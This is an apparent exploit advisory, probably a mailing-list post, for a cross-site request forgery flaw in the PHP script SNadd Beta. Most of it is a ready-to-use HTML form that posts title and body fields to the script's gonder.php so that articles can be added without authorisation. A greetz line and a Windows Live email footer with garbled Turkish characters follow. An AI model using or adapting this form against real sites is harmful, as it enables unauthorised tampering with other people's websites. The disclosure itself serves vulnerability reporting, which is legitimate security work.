SNadd Beta suffers from a cross site request forgery vulnerability.
0e66bd26cc76c13ee59d6039356b28e84fcd813c0bfabc6c687bd89fe47ef5a2
[+] Discovered by : Septemb0x
[+] Script Name : SNadd Beta
[+] Download Script : http://www.phpexplorer.com/goster/1191
[+] Bug Description : New article can be added
Exploit Codes :
<form method="POST" action="[sitename}/[scriptpath]/gonder.php">
<b>Baþlýk:</b><br>
<input type="text" name="baslik" size="62"><br><br>
<b>Yazý:</b><br>
<textarea name="yazi" cols="47" rows="12"></textarea><br><br>
<input type="submit" value="Ekle >>" name="ekle">
</form>
[+] Greetz : BARCOD3 - Bhdr - Phreaker - Nizam-ul Mülk - Türkeþhan - SenqRonize... All Friends...
_________________________________________________________________
Windows Live: Arkadaþlarýnýz size e-posta gönderdiklerinde Flickr, Twitter ve Digg'deki hareketlerinizi görürler.
http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_3:092010